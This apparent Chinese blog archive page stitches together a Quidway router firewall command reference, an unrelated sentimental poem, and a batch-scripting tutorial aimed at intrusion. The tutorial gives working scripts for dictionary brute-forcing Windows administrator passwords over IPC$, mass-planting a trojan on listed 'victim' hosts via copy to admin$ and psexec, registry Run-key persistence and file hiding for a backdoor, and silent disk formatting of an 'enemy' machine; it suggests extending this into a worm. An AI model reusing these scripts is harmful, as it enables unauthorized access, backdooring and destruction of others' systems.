Archive for 2006年4月16日


路由器防火墙配置命令

一、access-list 用于创建访问规则

  (1)创建标准访问列表

  access-list [ normal | special ] listnumber1 { permit | deny } source-addr [ source-mask ]

  (2)创建扩展访问列表

  access-list [ normal | special ] listnumber2 { permit | deny } protocol source-addr source-mask [ operator port1 [ port2 ] ] dest-addr dest-mask [ operator port1 [ port2 ] | icmp-type [ icmp-code ] ] [ log ]

  (3)删除访问列表

  no access-list { normal | special } { all | listnumber [ subitem ] }

  【参数说明】

  normal 指定规则加入普通时间段。

  special 指定规则加入特殊时间段。

  listnumber1 是1到99之间的一个数值,表示规则是标准访问列表规则。

  listnumber2 是100到199之间的一个数值,表示规则是扩展访问列表规则。

  permit 表明允许满足条件的报文通过。

  deny 表明禁止满足条件的报文通过。

  protocol 为协议类型,支持ICMP、TCP、UDP等,其它的协议也支持,此时没有端口比较的概念;为IP时有特殊含义,代表所有的IP协议。

  source-addr 为源地址。

  source-mask 为源地址通配位,在标准访问列表中是可选项,不输入则代表通配位为0.0.0.0。

  dest-addr 为目的地址。

  dest-mask 为目的地址通配位。

  operator[可选] 端口操作符,在协议类型为TCP或UDP时支持端口比较,支持的比较操作有:等于(eq)、大于(gt)、小于(lt)、不等于(neq)或介于(range);如果操作符为range,则后面需要跟两个端口。

  port1 在协议类型为TCP或UDP时出现,可以为关键字所设定的预设值(如telnet)或0~65535之间的一个数值。

  port2 在协议类型为TCP或UDP且操作类型为range时出现;可以为关键字所设定的预设值(如telnet)或0~65535之间的一个数值。

  icmp-type[可选] 在协议为ICMP时出现,代表ICMP报文类型;可以是关键字所设定的预设值(如echo-reply)或者是0~255之间的一个数值。

  icmp-code在协议为ICMP且没有选择所设定的预设值时出现;代表ICMP码,是0~255之间的一个数值。

  log [可选] 表示如果报文符合条件,需要做日志。

  listnumber 为删除的规则序号,是1~199之间的一个数值。

  subitem[可选] 指定删除序号为listnumber的访问列表中规则的序号。

  【缺省情况】

  系统缺省不配置任何访问规则。

  【命令模式】

  全局配置模式

  【使用指南】

  同一个序号的规则可以看作一类规则;所定义的规则不仅可以用来在接口上过滤报文,也可以被如DDR等用来判断一个报文是否是感兴趣的报文,此时,permit与deny表示是感兴趣的还是不感兴趣的。

  使用协议域为IP的扩展访问列表来表示所有的IP协议。

  同一个序号之间的规则按照一定的原则进行排列和选择,这个顺序可以通过 show access-list 命令看到。

【举例】

  允许源地址为10.1.1.0 网络、目的地址为10.1.2.0网络的WWW访问,但不允许使用FTP。

  Quidway(config)#access-list 100 permit tcp 10.1.1.0 0.0.0.255 10.1.2.0 0.0.0.255 eq www

  Quidway(config)#access-list 100 deny tcp 10.1.1.0 0.0.0.255 10.1.2.0 0.0.0.255 eq ftp

  【相关命令】

  ip access-group

  二、clear access-list counters 清除访问列表规则的统计信息

  clear access-list counters [ listnumber ]

  【参数说明】

  listnumber [可选] 要清除统计信息的规则的序号,如不指定,则清除所有的规则的统计信息。

  【缺省情况】

  任何时候都不清除统计信息。

  【命令模式】

  特权用户模式

  【使用指南】

  使用此命令来清除当前所用规则的统计信息,不指定规则编号则清除所有规则的统计信息。

  【举例】

  例1:清除当前所使用的序号为100的规则的统计信息。

  Quidway#clear access-list counters 100

  例2:清除当前所使用的所有规则的统计信息。

  Quidway#clear access-list counters

  【相关命令】

  access-list

  三、firewall 启用或禁止防火墙

  firewall { enable | disable }

  【参数说明】

  enable 表示启用防火墙。

  disable 表示禁止防火墙。

  【缺省情况】

  系统缺省为禁止防火墙。

  【命令模式】

  全局配置模式

  【使用指南】

  使用此命令来启用或禁止防火墙,可以通过show firewall命令看到相应结果。如果采用了时间段包过滤,则在防火墙被关闭时也将被关闭;该命令控制防火墙的总开关。在使用 firewall disable 命令关闭防火墙时,防火墙本身的统计信息也将被清除。

  【举例】

  启用防火墙。

  Quidway(config)#firewall enable

  【相关命令】

  access-list,ip access-group

  四、firewall default 配置防火墙在没有相应的访问规则匹配时,缺省的过滤方式

  firewall default { permit | deny }

  【参数说明】

  permit 表示缺省过滤属性设置为“允许”。

  deny 表示缺省过滤属性设置为“禁止”。

  【缺省情况】

  在防火墙开启的情况下,报文被缺省允许通过。

 【命令模式】

  全局配置模式

  【使用指南】

  当在接口应用的规则没有一个能够判断一个报文是否应该被允许还是禁止时,缺省的过滤属性将起作用;如果缺省过滤属性是“允许”,则报文可以通过,否则报文被丢弃。

  【举例】

  设置缺省过滤属性为“允许”。

  Quidway(config)#firewall default permit

  五、ip access-group 使用此命令将规则应用到接口上。使用此命令的no形式来删除相应的设置

  ip access-group listnumber { in | out }

  [ no ] ip access-group listnumber { in | out }

  【参数说明】

  listnumber 为规则序号,是1~199之间的一个数值。

  in 表示规则用于过滤从接口收上来的报文。

  out 表示规则用于过滤从接口转发的报文。

  【缺省情况】

  没有规则应用于接口。

  【命令模式】

  接口配置模式。

  【使用指南】

  使用此命令来将规则应用到接口上;如果要过滤从接口收上来的报文,则使用 in 关键字;如果要过滤从接口转发的报文,使用out 关键字。一个接口的一个方向上最多可以应用20类不同的规则;这些规则之间按照规则序号的大小进行排列,序号大的排在前面,也就是优先级高。对报文进行过滤时,将采用发现符合的规则即得出过滤结果的方法来加快过滤速度。所以,建议在配置规则时,尽量将对同一个网络配置的规则放在同一个序号的访问列表中;在同一个序号的访问列表中,规则之间的排列和选择顺序可以用show access-list命令来查看。

  【举例】

  将规则101应用于过滤从以太网口收上来的报文。

  Quidway(config-if-Ethernet0)#ip access-group 101 in

  【相关命令】

  access-list

  六、settr 设定或取消特殊时间段

  settr begin-time end-time

  no settr

  【参数说明】

  begin-time 为一个时间段的开始时间。

  end-time 为一个时间段的结束时间,应该大于开始时间。

  【缺省情况】

  系统缺省没有设置时间段,即认为全部为普通时间段。

  【命令模式】

  全局配置模式

【使用指南】

  使用此命令来设置时间段;可以最多同时设置6个时间段,通过show timerange 命令可以看到所设置的时间。如果在已经使用了一个时间段的情况下改变时间段,则此修改将在一分钟左右生效(系统查询时间段的时间间隔)。设置的时间应该是24小时制。如果要设置类似晚上9点到早上8点的时间段,可以设置成“settr 21:00 23:59 0:00 8:00”,因为所设置的时间段的两个端点属于时间段之内,故不会产生时间段内外的切换。另外这个设置也经过了2000问题的测试。

  【举例】

  例1:设置时间段为8:30 ~ 12:00,14:00 ~ 17:00。

  Quidway(config)#settr 8:30 12:00 14:00 17:00

  例2: 设置时间段为晚上9点到早上8点。

  Quidway(config)#settr 21:00 23:59 0:00 8:0

  【相关命令】

  timerange,show timerange

  七、show access-list 显示包过滤规则及在接口上的应用

  show access-list [ all | listnumber | interface interface-name ]

  【参数说明】

  all 表示所有的规则,包括普通时间段内及特殊时间段内的规则。

  listnumber 为显示当前所使用的规则中序号为listnumber的规则。

  interface 表示要显示在指定接口上应用的规则序号。

  interface-name 为接口的名称。

  【命令模式】

  特权用户模式

  【使用指南】

  使用此命令来显示所指定的规则,同时查看规则过滤报文的情况。每个规则都有一个相应的计数器,如果用此规则过滤了一个报文,则计数器加1;通过对计数器的观察可以看出所配置的规则中,哪些规则是比较有效,而哪些基本无效。可以通过带interface关键字的show access-list命令来查看某个接口应用规则的情况。

  【举例】

  例1:显示当前所使用的序号为100的规则。

  Quidway#show access-list 100

  Using normal packet-filtering access rules now.

  100 deny icmp 10.1.0.0 0.0.255.255 any host-redirect (3 matches,252 bytes — rule 1)

  100 permit icmp 10.1.0.0 0.0.255.255 any echo (no matches — rule 2)

  100 deny udp any any eq rip (no matches — rule 3)

  例2: 显示接口Serial0上应用规则的情况。

  Quidway#show access-list interface serial 0

  Serial0:

  access-list filtering In-bound packets : 120

  access-list filtering Out-bound packets: None

  【相关命令】

  access-list

  八、show firewall 显示防火墙状态

  show firewall

  【命令模式】

  特权用户模式

  【使用指南】

  使用此命令来显示防火墙的状态,包括防火墙是否被启用,启用防火墙时是否采用了时间段包过滤及防火墙的一些统计信息。

【举例】

  显示防火墙状态。

  Quidway#show firewall

  Firewall is enable, default filtering method is ‘permit’.

  TimeRange packet-filtering enable.

  InBound packets: None;

  OutBound packets: 0 packets, 0 bytes, 0% permitted,

  0 packets, 0 bytes, 0% denied,

  2 packets, 104 bytes, 100% permitted defaultly,

  0 packets, 0 bytes, 100% denied defaultly.

  From 00:13:02 to 06:13:21: 0 packets, 0 bytes, permitted.

  【相关命令】

  firewall

  九、show isintr 显示当前时间是否在时间段之内

  show isintr

  【命令模式】

  特权用户模式

  【使用指南】

  使用此命令来显示当前时间是否在时间段之内。

  【举例】

  显示当前时间是否在时间段之内。

  Quidway#show isintr

  It is NOT in time ranges now.

  【相关命令】

  timerange,settr

  十、show timerange 显示时间段包过滤的信息

  show timerange

  【命令模式】

  特权用户模式

  【使用指南】

  使用此命令来显示当前是否允许时间段包过滤及所设置的时间段。

【举例】

  显示时间段包过滤的信息。

  Quidway#show timerange

  TimeRange packet-filtering enable.

  beginning of time range:

  01:00 – 02:00

  03:00 – 04:00

  end of time range.

  【相关命令】

  timerange,settr

  十一、timerange 启用或禁止时间段包过滤功能

  timerange { enable | disable }

  【参数说明】

  enable 表示启用时间段包过滤。

  disable 表示禁止采用时间段包过滤。

  【缺省情况】

  系统缺省为禁止时间段包过滤功能。

  【命令模式】

  全局配置模式

  【使用指南】

  使用此命令来启用或禁止时间段包过滤功能,可以通过show firewall命令看到,也可以通过show timerange命令看到配置结果。在时间段包过滤功能被启用后,系统将根据当前的时间和设置的时间段来确定使用时间段内(特殊)的规则还是时间段外(普通)的规则。系统查询时间段的精确度为1分钟。所设置的时间段的两个端点属于时间段之内。

  【举例】

  启用时间段包过滤功能。

  Quidway(config)#timerange enable

  【相关命令】

  settr,show timerange

旁白:不知不觉已是你离开后的第2年
这样一个冬季 显得有点苍白无力

外面下着小雪 清洗着 每一寸街道
街上行人 匆匆而过 没留下任何痕迹
想到曾经发生的一切 就像是在昨夜
泪水已经悄悄滑落在脸颊

为何还要落泪 为何还会为你伤悲
曾和你的一切 已经不会再复燃
为何还要执着 你已不是当初的你

旁白:还记得和你在一起的日子
那样一个冬季 却充满了温馨

躺在你怀里 看着窗外的大雪
和你一起嘻戏 看着外面路过的行人
你给了我 人世间最美的诺言
而今它已消然而去 而还是当初的我

为何还要落泪 为何还会为你伤悲
曾和你的一切 已经不会再复燃
为何还要执着 你已不是当初的你

旁白:一切都该有个新的开始了…

一.简单批处理内部命令简介
1.Echo 命令
打开回显或关闭请求回显功能,或显示消息。如果没有任何参数,echo 命令将显示当前回显设置。
语法
echo [{on|off}] [message]
Sample:@echo off / echo hello world
在实际应用中我们会把这条命令和重定向符号(也称为管道符号,一般用> >> ^)结合来实现输入一些命令到特定格式的文件中.这将在以后的例子中体现出来。

2.@ 命令
表示不显示@后面的命令,在入侵过程中(例如使用批处理来格式化敌人的硬盘)自然不能让对方看到你使用的命令啦。
Sample:@echo off
@echo Now initializing the program,please wait a minite…
@format X: /q/u/autoset (format 这个命令是不可以使用/y这个参数的,可喜的是微软留了个autoset这个参数给我们,效果和/y是一样的。)

3.Goto 命令
指定跳转到标签,找到标签后,程序将处理从下一行开始的命令。
语法:goto label (label是参数,指定所要转向的批处理程序中的行。)
Sample:
if {%1}=={} goto noparms
if {%2}=={} goto noparms(如果这里的if、%1、%2你不明白的话,先跳过去,后面会有详细的解释。)
@Rem check parameters if null show usage
:noparms
echo Usage: monitor.bat ServerIP PortNumber
goto end
标签的名字可以随便起,但是最好是有意义的字母啦,字母前加个:用来表示这个字母是标签,goto命令就是根据这个:来寻找下一步跳到到那里。最好有一些说明这样你别人看起来才会理解你的意图啊。

4.Rem 命令
注释命令,在C语言中相当与/*——–*/,它并不会被执行,只是起一个注释的作用,便于别人阅读和你自己日后修改。
Rem Message
Sample:@Rem Here is the description.

5.Pause 命令
运行 Pause 命令时,将显示下面的消息:
Press any key to continue . . .
Sample:
@echo off
:begin
copy a:*.* d:back
echo Please put a new disk into driver A
pause
goto begin
在这个例子中,驱动器 A 中磁盘上的所有文件均复制到d:back中。显示的注释提示您将另一张磁盘放入驱动器 A 时,pause 命令会使程序挂起,以便您更换磁盘,然后按任意键继续处理。

6.Call 命令
从一个批处理程序调用另一个批处理程序,并且不终止父批处理程序。call 命令接受用作调用目标的标签。如果在脚本或批处理文件外使用 Call,它将不会在命令行起作用。
语法
call [[Drive:][Path] FileName [BatchParameters]] [:label [arguments]]
参数
[Drive:}[Path] FileName
指定要调用的批处理程序的位置和名称。filename 参数必须具有 .bat 或 .cmd 扩展名。

7.start 命令
调用外部程序,所有的DOS命令和命令行程序都可以由start命令来调用。
入侵常用参数:
MIN 开始时窗口最小化
SEPARATE 在分开的空间内开始 16 位 Windows 程序
HIGH 在 HIGH 优先级类别开始应用程序
REALTIME 在 REALTIME 优先级类别开始应用程序
WAIT 启动应用程序并等候它结束
parameters 这些为传送到命令/程序的参数
执行的应用程序是 32-位 GUI 应用程序时,CMD.EXE 不等应用程序终止就返回命令提示。如果在命令脚本内执行,该新行为则不会发生。
8.choice 命令
choice 使用此命令可以让用户输入一个字符,从而运行不同的命令。使用时应该加/c:参数,c:后应写提示可输入的字符,之间无空格。它的返回码为1234……
如: choice /c:dme defrag,mem,end
将显示
defrag,mem,end[D,M,E]?
Sample:
Sample.bat的内容如下:
@echo off
choice /c:dme defrag,mem,end
if errorlevel 3 goto defrag (应先判断数值最高的错误码)
if errorlevel 2 goto mem
if errotlevel 1 goto end

:defrag
c:dosdefrag
goto end
:mem
mem
goto end
:end
echo good bye

此文件运行后,将显示 defrag,mem,end[D,M,E]? 用户可选择d m e ,然后if语句将作出判断,d表示执行标号为defrag的程序段,m表示执行标号为mem的程序段,e表示执行标号为end的程序段,每个程序段最后都以goto end将程序跳到end标号处,然后程序将显示good bye,文件结束。

9.If 命令

if 表示将判断是否符合规定的条件,从而决定执行不同的命令。 有三种格式:
1、if "参数" == "字符串"  待执行的命令
参数如果等于指定的字符串,则条件成立,运行命令,否则运行下一句。(注意是两个等号)
如if "%1"=="a" format a:
if {%1}=={} goto noparms
if {%2}=={} goto noparms

2、if exist 文件名  待执行的命令
如果有指定的文件,则条件成立,运行命令,否则运行下一句。
如if exist config.sys edit config.sys

3、if errorlevel / if not errorlevel 数字  待执行的命令
如果返回码等于指定的数字,则条件成立,运行命令,否则运行下一句。
如if errorlevel 2 goto x2  
DOS程序运行时都会返回一个数字给DOS,称为错误码errorlevel或称返回码,常见的返回码为0、1。

10.for 命令
for 命令是一个比较复杂的命令,主要用于参数在指定的范围内循环执行命令。
在批处理文件中使用 FOR 命令时,指定变量请使用 %%variable

for {%variable|%%variable} in (set) do command [ CommandLineOptions]
%variable 指定一个单一字母可替换的参数。
(set) 指定一个或一组文件。可以使用通配符。
command 指定对每个文件执行的命令。
command-parameters 为特定命令指定参数或命令行开关。
在批处理文件中使用 FOR 命令时,指定变量请使用 %%variable
而不要用 %variable。变量名称是区分大小写的,所以 %i 不同于 %I

如果命令扩展名被启用,下列额外的 FOR 命令格式会受到
支持:

FOR /D %variable IN (set) DO command [command-parameters]

如果集中包含通配符,则指定与目录名匹配,而不与文件
名匹配。

FOR /R [[drive:]path] %variable IN (set) DO command [command-

检查以 [drive:]path 为根的目录树,指向每个目录中的
FOR 语句。如果在 /R 后没有指定目录,则使用当前
目录。如果集仅为一个单点(.)字符,则枚举该目录树。

FOR /L %variable IN (start,step,end) DO command [command-para

该集表示以增量形式从开始到结束的一个数字序列。
因此,(1,1,5) 将产生序列 1 2 3 4 5,(5,-1,1) 将产生
序列 (5 4 3 2 1)。

FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN (‘command’) DO command

或者,如果有 usebackq 选项:

FOR /F ["options"] %variable IN (file-set) DO command
FOR /F ["options"] %variable IN ("string") DO command
FOR /F ["options"] %variable IN (‘command’) DO command

filenameset 为一个或多个文件名。继续到 filenameset 中的
下一个文件之前,每份文件都已被打开、读取并经过处理。
处理包括读取文件,将其分成一行行的文字,然后将每行
解析成零或更多的符号。然后用已找到的符号字符串变量值
调用 For 循环。以默认方式,/F 通过每个文件的每一行中分开
的第一个空白符号。跳过空白行。您可通过指定可选 "options"
参数替代默认解析操作。这个带引号的字符串包括一个或多个
指定不同解析选项的关键字。这些关键字为:

eol=c – 指一个行注释字符的结尾(就一个)
skip=n – 指在文件开始时忽略的行数。
delims=xxx – 指分隔符集。这个替换了空格和跳格键的
默认分隔符集。
tokens=x,y,m-n – 指每行的哪一个符号被传递到每个迭代
的 for 本身。这会导致额外变量名称的
格式为一个范围。通过 nth 符号指定 m
符号字符串中的最后一个字符星号,
那么额外的变量将在最后一个符号解析之
分配并接受行的保留文本。
usebackq – 指定新语法已在下类情况中使用:
在作为命令执行一个后引号的字符串并且
引号字符为文字字符串命令并允许在 fi
中使用双引号扩起文件名称。

sample1:
FOR /F "eol=; tokens=2,3* delims=, " %i in (myfile.txt) do command

会分析 myfile.txt 中的每一行,忽略以分号打头的那些行,将
每行中的第二个和第三个符号传递给 for 程序体;用逗号和/或
空格定界符号。请注意,这个 for 程序体的语句引用 %i 来
取得第二个符号,引用 %j 来取得第三个符号,引用 %k
来取得第三个符号后的所有剩余符号。对于带有空格的文件
名,您需要用双引号将文件名括起来。为了用这种方式来使
用双引号,您还需要使用 usebackq 选项,否则,双引号会
被理解成是用作定义某个要分析的字符串的。

%i 专门在 for 语句中得到说明,%j 和 %k 是通过
tokens= 选项专门得到说明的。您可以通过 tokens= 一行
指定最多 26 个符号,只要不试图说明一个高于字母 ‘z’ 或
‘Z’ 的变量。请记住,FOR 变量是单一字母、分大小写和全局的;
同时不能有 52 个以上都在使用中。

您还可以在相邻字符串上使用 FOR /F 分析逻辑;方法是,
用单引号将括号之间的 filenameset 括起来。这样,该字符
串会被当作一个文件中的一个单一输入行。

最后,您可以用 FOR /F 命令来分析命令的输出。方法是,将
括号之间的 filenameset 变成一个反括字符串。该字符串会
被当作命令行,传递到一个子 CMD.EXE,其输出会被抓进
内存,并被当作文件分析。因此,以下例子:

FOR /F "usebackq delims==" %i IN (`set`) DO @echo %i

会枚举当前环境中的环境变量名称。

另外,FOR 变量参照的替换已被增强。您现在可以使用下列
选项语法:

~I – 删除任何引号("),扩充 %I
%~fI – 将 %I 扩充到一个完全合格的路径名
%~dI – 仅将 %I 扩充到一个驱动器号
%~pI – 仅将 %I 扩充到一个路径
%~nI – 仅将 %I 扩充到一个文件名
%~xI – 仅将 %I 扩充到一个文件扩展名
%~sI – 扩充的路径只含有短名
%~aI – 将 %I 扩充到文件的文件属性
%~tI – 将 %I 扩充到文件的日期/时间
%~zI – 将 %I 扩充到文件的大小
%~$PATH:I – 查找列在路径环境变量的目录,并将 %I 扩充
到找到的第一个完全合格的名称。如果环境变量
未被定义,或者没有找到文件,此组合键会扩充
空字符串

可以组合修饰符来得到多重结果:

%~dpI – 仅将 %I 扩充到一个驱动器号和路径
%~nxI – 仅将 %I 扩充到一个文件名和扩展名
%~fsI – 仅将 %I 扩充到一个带有短名的完整路径名
%~dp$PATH:i – 查找列在路径环境变量的目录,并将 %I 扩充
到找到的第一个驱动器号和路径。
%~ftzaI – 将 %I 扩充到类似输出线路的 DIR

在以上例子中,%I 和 PATH 可用其他有效数值代替。%~ 语法
用一个有效的 FOR 变量名终止。选取类似 %I 的大写变量名
比较易读,而且避免与不分大小写的组合键混淆。

以上是MS的官方帮助,下面我们举几个例子来具体说明一下For命令在入侵中的用途。

sample2:

利用For命令来实现对一台目标Win2k主机的暴力密码破解。
我们用net use \ipipc$ "password" /u:"administrator"来尝试这和目标主机进行连接,当成功时记下密码。
最主要的命令是一条:for /f i% in (dict.txt) do net use \ipipc$ "i%" /u:"administrator"
用i%来表示admin的密码,在dict.txt中这个取i%的值用net use 命令来连接。然后将程序运行结果传递给find命令--
for /f i%% in (dict.txt) do net use \ipipc$ "i%%" /u:"administrator"|find ":命令成功完成">>D:ok.txt ,这样就ko了。

sample3:

你有没有过手里有大量肉鸡等着你去种后门+木马呢?,当数量特别多的时候,原本很开心的一件事都会变得很郁闷:)。文章开头就谈到使用批处理文件,可以简化日常或重复性任务。那么如何实现呢?呵呵,看下去你就会明白了。

主要命令也只有一条:(在批处理文件中使用 FOR 命令时,指定变量使用 %%variable)
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call door.bat %%i %%j %%k
tokens的用法请参见上面的sample1,在这里它表示按顺序将victim.txt中的内容传递给door.bat中的参数%i %j %k。
而cultivate.bat无非就是用net use命令来建立IPC$连接,并copy木马+后门到victim,然后用返回码(If errorlever =)来筛选成功种植后门的主机,并echo出来,或者echo到指定的文件。
delims= 表示vivtim.txt中的内容是一空格来分隔的。我想看到这里你也一定明白这victim.txt里的内容是什么样的了。应该根据%%i %%j %%k表示的对象来排列,一般就是 ip password username。
代码雏形:
————— cut here then save as a batchfile(I call it main.bat ) —————————
@echo off
@if "%1"=="" goto usage
@for /f "tokens=1,2,3 delims= " %%i in (victim.txt) do start call IPChack.bat %%i %%j %%k
@goto end
:usage
@echo run this batch in dos modle.or just double-click it.
:end
————— cut here then save as a batchfile(I call it main.bat ) —————————

——————- cut here then save as a batchfile(I call it door.bat) —————————–
@net use \%1ipc$ %3 /u:"%2"
@if errorlevel 1 goto failed
@echo Trying to establish the IPC$ connection …………OK
@copy windrv32.exe\%1admin$system32 && if not errorlevel 1 echo IP %1 USER %2 PWD %3 >>ko.txt
@psexec \%1 c:winntsystem32windrv32.exe
@psexec \%1 net start windrv32 && if not errorlevel 1 echo %1 Backdoored >>ko.txt
:failed
@echo Sorry can not connected to the victim.
—————– cut here then save as a batchfile(I call it door.bat) ——————————–
这只是一个自动种植后门批处理的雏形,两个批处理和后门程序(Windrv32.exe),PSexec.exe需放在统一目录下.批处理内容
尚可扩展,例如:加入清除日志+DDOS的功能,加入定时添加用户的功能,更深入一点可以使之具备自动传播功能(蠕虫).此处不多做叙述,有兴趣的朋友可自行研究.

二.如何在批处理文件中使用参数
批处理中可以使用参数,一般从1%到 9%这九个,当有多个参数时需要用shift来移动,这种情况并不多见,我们就不考虑它了。
sample1:fomat.bat
@echo off
if "%1"=="a" format a:
:format
@format a:/q/u/auotset
@echo please insert another disk to driver A.
@pause
@goto fomat
这个例子用于连续地格式化几张软盘,所以用的时候需在dos窗口输入fomat.bat a,呵呵,好像有点画蛇添足了~^_^
sample2:
当我们要建立一个IPC$连接地时候总要输入一大串命令,弄不好就打错了,所以我们不如把一些固定命令写入一个批处理,把肉鸡地ip password username 当着参数来赋给这个批处理,这样就不用每次都打命令了。
@echo off
@net use \1%ipc$ "2%" /u:"3%" 注意哦,这里PASSWORD是第二个参数。
@if errorlevel 1 echo connection failed
怎么样,使用参数还是比较简单的吧?你这么帅一定学会了^_^.No.3

三.如何使用组合命令(Compound Command)

1.&

Usage:第一条命令 & 第二条命令 [& 第三条命令…]

用这种方法可以同时执行多条命令,而不管命令是否执行成功

Sample:
C:>dir z: & dir c:Ex4rch
The system cannot find the path specified.
Volume in drive C has no label.
Volume Serial Number is 0078-59FB

Directory of c:Ex4rch

2002-05-14 23:51 <DIR> .
2002-05-14 23:51 <DIR> ..
2002-05-14 23:51 14 sometips.gif

2.&&

Usage:第一条命令 && 第二条命令 [&& 第三条命令…]

用这种方法可以同时执行多条命令,当碰到执行出错的命令后将不执行后面的命令,如果一直没有出错则一直执行完所有命令;

Sample:
C:>dir z: && dir c:Ex4rch
The system cannot find the path specified.

C:>dir c:Ex4rch && dir z:
Volume in drive C has no label.
Volume Serial Number is 0078-59FB

Directory of c:Ex4rch

2002-05-14 23:55 <DIR> .
2002-05-14 23:55 <DIR> ..
2002-05-14 23:55 14 sometips.gif
1 File(s) 14 bytes
2 Dir(s) 768,671,744 bytes free
The system cannot find the path specified.

在做备份的时候可能会用到这种命令会比较简单,如:
dir file://192.168.0.1/database/backup.mdb && copy file://192.168.0.1/database/backup.mdb E:backup
如果远程服务器上存在backup.mdb文件,就执行copy命令,若不存在该文件则不执行copy命令。这种用法可以替换IF exist了 :)

3.||

Usage:第一条命令 || 第二条命令 [|| 第三条命令…]

用这种方法可以同时执行多条命令,当碰到执行正确的命令后将不执行后面的命令,如果没有出现正确的命令则一直执行完所有命令;

Sample:
C:Ex4rch>dir sometips.gif || del sometips.gif
Volume in drive C has no label.
Volume Serial Number is 0078-59FB

Directory of C:Ex4rch

2002-05-14 23:55 14 sometips.gif
1 File(s) 14 bytes
0 Dir(s) 768,696,320 bytes free

组合命令使用的例子:
sample:
@copy trojan.exe \%1admin$system32 && if not errorlevel 1 echo IP %1 USER %2 PASS %3 >>victim.txt

四、管道命令的使用

1.| 命令
Usage:第一条命令 | 第二条命令 [| 第三条命令…]
将第一条命令的结果作为第二条命令的参数来使用,记得在unix中这种方式很常见。

sample:
time /t>>D:IP.log
netstat -n -p tcp|find ":3389">>D:IP.log
start Explorer
看出来了么?用于终端服务允许我们为用户自定义起始的程序,来实现让用户运行下面这个bat,以获得登录用户的IP。

2.>、>>输出重定向命令
将一条命令或某个程序输出结果的重定向到特定文件中, > 与 >>的区别在于,>会清除调原有文件中的内容后写入指定文件,而>>只会追加内容到指定文件中,而不会改动其中的内容。

sample1:
echo hello world>c:hello.txt (stupid example?)

sample2:
时下DLL木马盛行,我们知道system32是个捉迷藏的好地方,许多木马都削尖了脑袋往那里钻,DLL马也不例外,针对这一点我们可以在安装好系统和必要的应用程序后,对该目录下的EXE和DLL文件作一个记录:
运行CMD–转换目录到system32–dir *.exe>exeback.txt & dir *.dll>dllback.txt,
这样所有的EXE和DLL文件的名称都被分别记录到exeback.txt和dllback.txt中,
日后如发现异常但用传统的方法查不出问题时,则要考虑是不是系统中已经潜入DLL木马了.
这时我们用同样的命令将system32下的EXE和DLL文件记录到另外的exeback1.txt和dllback1.txt中,然后运行:
CMD–fc exeback.txt exeback1.txt>diff.txt & fc dllback.txt dllback1.txt>diff.txt.(用FC命令比较前后两次的DLL和EXE文件,并将结果输入到diff.txt中),这样我们就能发现一些多出来的DLL和EXE文件,然后通过查看创建时间、版本、是否经过压缩等就能够比较容易地判断出是不是已经被DLL木马光顾了。没有是最好,如果有的话也不要直接DEL掉,先用regsvr32 /u trojan.dll将后门DLL文件注销掉,再把它移到回收站里,若系统没有异常反映再将之彻底删除或者提交给杀毒软件公司。

3.< 、>& 、<&
< 从文件中而不是从键盘中读入命令输入。
>& 将一个句柄的输出写入到另一个句柄的输入中。
<& 从一个句柄读取输入并将其写入到另一个句柄输出中。
这些并不常用,也就不多做介绍。 

五.如何用批处理文件来操作注册表

在入侵过程中经常回操作注册表的特定的键值来实现一定的目的,例如:为了达到隐藏后门、木马程序而删除Run下残余的键值。或者创建一个服务用以加载后门。当然我们也会修改注册表来加固系统或者改变系统的某个属性,这些都需要我们对注册表操作有一定的了解。下面我们就先学习一下如何使用.REG文件来操作注册表.(我们可以用批处理来生成一个REG文件)
关于注册表的操作,常见的是创建、修改、删除。

1.创建
创建分为两种,一种是创建子项(Subkey)

我们创建一个文件,内容如下:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINESOFTWAREMicrosofthacker]

然后执行该脚本,你就已经在HKEY_LOCAL_MACHINESOFTWAREMicrosoft下创建了一个名字为“hacker”的子项。

另一种是创建一个项目名称
那这种文件格式就是典型的文件格式,和你从注册表中导出的文件格式一致,内容如下:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
"Invader"="Ex4rch"
"Door"=C:\WINNT\system32\door.exe
"Autodos"=dword:02

这样就在[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]下
新建了:Invader、door、about这三个项目
Invader的类型是“String Value”
door的类型是“REG SZ Value”
Autodos的类型是“DWORD Value”

2.修改
修改相对来说比较简单,只要把你需要修改的项目导出,然后用记事本进行修改,然后导入(regedit /s)即可。

3.删除
我们首先来说说删除一个项目名称,我们创建一个如下的文件:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
"Ex4rch"=-

执行该脚本,[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]下的"Ex4rch"就被删除了;

我们再看看删除一个子项,我们创建一个如下的脚本:

Windows Registry Editor Version 5.00

[-HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]

执行该脚本,[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]就已经被删除了。

相信看到这里,.reg文件你基本已经掌握了。那么现在的目标就是用批处理来创建特定内容的.reg文件了,记得我们前面说道的利用重定向符号可以很容易地创建特定类型的文件。

samlpe1:如上面的那个例子,如想生成如下注册表文件
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]
"Invader"="Ex4rch"
"door"=hex:255
"Autodos"=dword:000000128
只需要这样:
@echo Windows Registry Editor Version 5.00>>Sample.reg

@echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]>Sample.reg
@echo "Invader"="Ex4rch">>Sample.reg
@echo "door"=5>>C:\WINNT\system32\door.exe>>Sample.reg
@echo "Autodos"=dword:02>>Sample.reg

samlpe2:
我们现在在使用一些比较老的木马时,可能会在注册表的[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun(Runonce、Runservices、Runexec)]下生成一个键值用来实现木马的自启动.但是这样很容易暴露木马程序的路径,从而导致木马被查杀,相对地若是将木马程序注册为系统服务则相对安全一些.下面以配置好地IRC木马DSNX为例(名为windrv32.exe)
@start windrv32.exe
@attrib +h +r windrv32.exe
@echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] >>patch.dll
@echo "windsnx "=- >>patch.dll
